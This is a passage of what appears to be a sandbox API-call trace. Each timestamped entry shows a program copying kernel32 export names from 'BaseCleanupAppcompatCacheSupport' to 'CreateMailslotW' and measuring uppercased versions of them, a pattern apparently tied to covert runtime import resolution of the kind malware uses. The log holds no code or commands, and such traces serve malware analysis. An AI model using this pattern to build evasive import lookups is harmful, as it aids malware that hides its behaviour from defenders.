lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.076] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.076] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.076] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.076] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.076] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.076] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.076] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.076] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.076] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.076] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.076] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.077] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.077] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.077] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.077] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.077] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.077] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.077] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.077] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.077] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.077] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.077] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.077] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.077] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.077] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.077] lstrlenA (lpString="BEEP") returned 4 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.077] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.077] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.077] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.077] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.078] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.078] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.078] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.078] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.078] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.078] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.078] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.078] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.078] lstrlenA (lpString="CANCELIO") returned 8 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.078] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.078] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.078] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.078] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.078] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.078] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.078] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.078] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.078] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.078] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.078] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.079] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.079] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.079] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.079] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.079] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.079] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.079] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.079] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.079] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.079] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.079] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.079] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.079] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.079] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.079] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.079] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.079] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.079] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.079] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.080] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.080] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.080] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.080] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.080] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.080] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.080] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.080] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.080] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.080] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.080] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.080] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.080] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.080] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.080] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.080] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.080] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.080] lstrlenA (lpString="COPYFILEA") returned 9 [0079.080] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.081] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.081] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.081] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.081] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.081] lstrlenA (lpString="COPYFILEW") returned 9 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.081] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.081] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.081] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.081] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.081] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.081] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.081] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.081] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.081] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.081] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.081] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.081] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.081] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.081] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.081] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.082] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.082] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.082] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.082] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.082] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.082] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.082] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.082] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.082] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.082] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.082] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.082] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.082] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.082] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.082] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.082] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.082] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.082] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.082] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.083] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.083] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.083] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.083] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.083] 